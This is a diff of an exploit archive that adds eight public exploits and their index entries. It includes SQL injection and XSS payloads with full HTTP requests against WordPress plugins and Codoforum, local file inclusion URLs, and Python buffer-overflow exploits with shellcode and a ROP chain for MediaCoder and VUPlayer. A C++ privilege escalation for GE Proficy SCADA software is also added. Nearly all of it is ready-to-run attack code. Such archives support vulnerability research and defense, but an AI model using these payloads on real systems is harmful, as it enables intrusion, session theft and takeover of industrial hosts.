DB: 2016-07-08

8 new exploits

WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities
WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities

Codoforum 3.4 - Stored Cross-Site Scripting
MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit
VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)

Core FTP LE 2.2 - Path Field Local Buffer Overflow
OPAC KpwinSQL - Multiple Vulnerabilities
GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation

files.csv

@@ -36002,6 +36002,8 @@ id,file,description,date,author,platform,type,port
 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
+39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
+39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
 39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
@@ -36196,7 +36198,10 @@ id,file,description,date,author,platform,type,port
 40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
 40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
+40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80
 40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
+40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
+40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
 40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
 40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
 40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
@@ -36215,6 +36220,7 @@ id,file,description,date,author,platform,type,port
 40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
 40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
 40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
+40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0
 40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
 40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
@@ -36238,3 +36244,5 @@ id,file,description,date,author,platform,type,port
 40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
 40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
+40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
+40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0

platforms/php/webapps/39806.txt

@@ -0,0 +1,71 @@
+# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
+# Google Dork: inurl:"wp-content/plugins/q-and-a"
+# Date: 12-05-2016
+# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
+# Version: 1.3.9.7 and prior
+# Exploit Author: Gwendal Le Coguic
+# Website: http://10degres.net
+# Category: webapps
+
+
+Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
+A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
+
+The plugin was originally named "Q and A FAQ" and developped by Raygun company 
+then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
+
+
+##### Full Path Disclosure #####
+
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
+
+
+##### SQL Injection #####
+
+Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
+
+Paramater hdnParentID is vulnerable in two places.
+Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
+
+1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
+
+POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 165
+
+btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
+
+
+2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
+
+POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 84
+
+btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
+
+
+##### References #####
+
+https://www.owasp.org/index.php/Full_Path_Disclosure
+https://www.owasp.org/index.php/SQL_Injection
+

platforms/php/webapps/39807.txt

@@ -0,0 +1,62 @@
+# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
+# Google Dork: inurl:"wp-content/plugins/gallery-images/"
+# Date: 12-05-2016
+# Software Link: https://fr.wordpress.org/plugins/gallery-images/
+# Version: 1.8.9 and prior
+# Exploit Author: Gwendal Le Coguic
+# Website: http://10degres.net
+# Category: webapps
+
+
+##### About #####
+
+Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
+
+
+##### Full Path Disclosure #####
+
+http://[target]/wp-content/plugins/gallery-images/gallery-images.php
+
+
+##### SQL Injection #####
+
+Headers X-Forwarded-For and Client-Ip are vulnerable.
+Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
+Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Client-Ip: 123.123.123.123
+X-Forwarded-For: 123.123.123.123
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 89
+
+action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
+
+
+### Extras infos #####
+
+The "galleryid" must be configured or try another id.
+
+You don't need to be authed to exploit the injection but the plugin must be enable.
+
+"task" parameter can be:
+  load_images_content
+  load_images_lightbox
+  load_image_justified
+  load_image_thumbnail
+  load_blog_view
+
+Client-Ip overwrite X-Forwarded-For.
+Some system drop those headers.
+
+
+##### References #####
+
+https://www.owasp.org/index.php/Full_Path_Disclosure
+https://www.owasp.org/index.php/SQL_Injection
+

platforms/php/webapps/40015.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
+# Google Dork: intext:"powered by codoforum"
+# Date: 01/06/2016
+# Exploit Author: Ahmed Sherif (OffensiveBits)
+# Vendor Homepage: http://codologic.com/page/
+# Software Link: http://codoforum.com/index.php
+# Version: V3.4
+# Tested on: Linux Mint
+
+
+1. Description:
+
+The Reply and search functionalities are both vulnerable to Stored XSS due
+to improper filtration in displaying the content of replies.
+
+
+2. Steps to reproduce the vulnerability:
+
+
+1. Login to your account.
+2. look for any topic and add a reply .
+3. in the reply textbox add a widely used common keyword within xss
+payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
+4. while any user surfing the topic and started to search for specific
+keywords the javascript code will be executed.
+
+
+
+3. Solution:
+
+The new version of codoforum will be released this week.

platforms/php/webapps/40068.txt

@@ -0,0 +1,36 @@
+OPAC KpwinSQL LFI/XSS Vulnerabilities
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Product Website	: http://www.kpsys.cz/
+Affected version: All
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+ 
+Description: 
+KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
+	+ index.php
+	+ help.php
+	+ logpin.php
+	+ brow.php
+	+ indexs.php
+	+ search.php
+	+ hledani.php
+	+ hled_hesl.php
+before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
+
+Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Tested on: Apache/2.2.11 (Win32)
+           PHP/5.2.9-2
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Vulnerabilities discovered by Yakir Wizman
+                              https://www.linkedin.com/in/yakirwizman
+Date: 06.07.2016
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Proof Of Concept:
+
+Local File Inclusion example:
+http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
+
+Cross Site Scripting example:
+http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze

platforms/windows/dos/40038.py

@@ -0,0 +1,33 @@
+'''
+# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
+# Date: 2016-6-28
+# Exploit Author: Netfairy
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
+# Version: 2.2
+# Tested on: Windows7 Professional SP1 En x86
+# CVE : N/A
+[+] Type : Buffer overflow
+[+] Detail : 
+[-]  The vulnerability has the most typical Buffer overflow vulnerabilities. 
+[-]  enter the application and Input "A"*800 to the path box the press enter
+[-] crash info
+0:008> g
+(4d48.4cc8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
+eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0         nv up ei pl nz na po nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
+*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
+coreftp+0x10041:
+00410041 008b45fc8be5    add     byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
+
+
+########generate "A"*800
+'''
+
+import struct
+junk = "A" * 800
+with open("exp.txt","wb") as f :
+f.write(junk)

platforms/windows/local/40017.py

@@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
+# Date: 25-June-2016
+# Exploit Author: Sibusiso Sishi 
+# Email: sibusiso [at] IronSky [dot] co.za
+# Vendor Homepage: http://www.mediacoderhq.com/
+# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
+# Version: 0.8.43.5830
+# Tested on: Windows XP SP3 EN
+
+
+
+#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
+shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
+"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
+"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
+"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
+"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
+"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
+"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
+"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
+"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
+"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
+"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
+"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
+"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
+"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
+
+
+seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
+nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
+nop_sled = "\x90" * 14
+
+buff = "http:// " 
+buff += "A" * 776
+buff += nseh
+buff += seh
+buff += nop_sled
+buff += shellcode
+buff += "D" * (4216 - (len(shellcode + nop_sled)))
+fo = open("foo.m3u", "wb")
+fo.write (buff)
+fo.close()

platforms/windows/local/40018.py

@@ -0,0 +1,88 @@
+#!/usr/bin/env python
+#
+# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
+# Date: 26-06-2016
+# Exploit Author: secfigo
+# Vendor Homepage: http://vuplayer.com/
+# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe 
+# Version: VUPlayer <=2.49
+# Tested on: Windows 7 SP1 DEP=alwayson
+# Greetz: Raghu, nullSingapore
+###################################################################################
+
+
+import struct
+
+###################################################################################
+# Shellcode
+# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
+###################################################################################
+
+shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
+"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
+"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
+"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
+"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
+"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
+"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
+"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
+"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
+"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
+"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
+"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
+"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
+"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
+"\x1c\x80")
+
+junk = "HTTP://" + "A"*1005
+
+
+
+
+###################################################################################
+# rop gadgets with some modifications
+# bad characters = "\x00\x09\x0a\x0d\x1a"
+###################################################################################
+
+def create_rop_chain():
+
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+      0x10010157,  # POP EBP # RETN [BASS.dll] 
+      0x10010157,  # skip 4 bytes [BASS.dll]
+      0x10015f77,  # POP EAX # RETN [BASS.dll] 
+      0xfffffdff,  # Value to negate, will become 0x00000201
+      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
+      0x10032f72,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
+      0x10015f82,  # POP EAX # RETN [BASS.dll] 
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
+      0x10038a6d,  # XCHG EAX,EDX # RETN [BASS.dll] 
+      0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
+      0x101082db,  # &Writable location [BASSWMA.dll]
+      0x1001621c,  # POP EDI # RETN [BASS.dll] 
+      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
+      0x10604154,  # POP ESI # RETN [BASSMIDI.dll] 
+      0x10101c02,  # JMP [EAX] [BASSWMA.dll]
+      0x10015fe7,  # POP EAX # RETN [BASS.dll] 
+      0x1060e25c,  # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
+      0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
+      0x10022aa7,  # ptr to 'jmp esp' [BASS.dll]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+
+eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
+
+nops ="\x90"* 16
+
+buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
+
+print "[+] Creating .m3u file of size "+ str(len(buffer))
+file = open('vuplayer-dep.m3u','w');
+file.write(buffer);
+file.close();
+print "[+] Done creating the file"

platforms/windows/local/40069.cpp

@@ -0,0 +1,59 @@
+/*
+# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
+# Vulnerability Discovery and Exploit Author: Zhou Yu
+# Email: <504137480@qq.com>
+# Version: 8.2
+# Tested on: Windows 7 SP1 X32
+# CVE : None
+
+Vulnerability Description:
+SERVICE_CHANGE_CONFIG Privilege Escalation
+C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
+CimProxy
+  Medium Mandatory Level (Default) [No-Write-Up]
+  RW Everyone
+        SERVICE_ALL_ACCESS
+
+C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
+[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>
+
+SERVICE_NAME: CimProxy
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
+Proxy.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : CIMPLICITY Proxy Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+Usage:
+Put evil.exe and the exploit in the same folder and then run the exploit.
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <string.h>
+void main()
+{
+	char szPath[MAX_PATH];
+	char *t;
+    GetModuleFileName(NULL,szPath,MAX_PATH);
+	t = strrchr(szPath, 0x5C);
+	t[0] = '\\';
+	t[1] = '\0';
+	strcat(szPath,"evil.exe\"");
+	char t1[] = "\"cmd.exe /c ";
+	char payload[] = "sc config CimProxy binPath= ";
+	strcat(t1,szPath);
+	strcat(payload,t1);
+ 
+	system(payload);
+	//stop service
+	printf("stop service!\n");
+	system("net stop CimProxy");
+	//start service
+	printf("start service!\n");
+	system("net start CimProxy");
+	
+}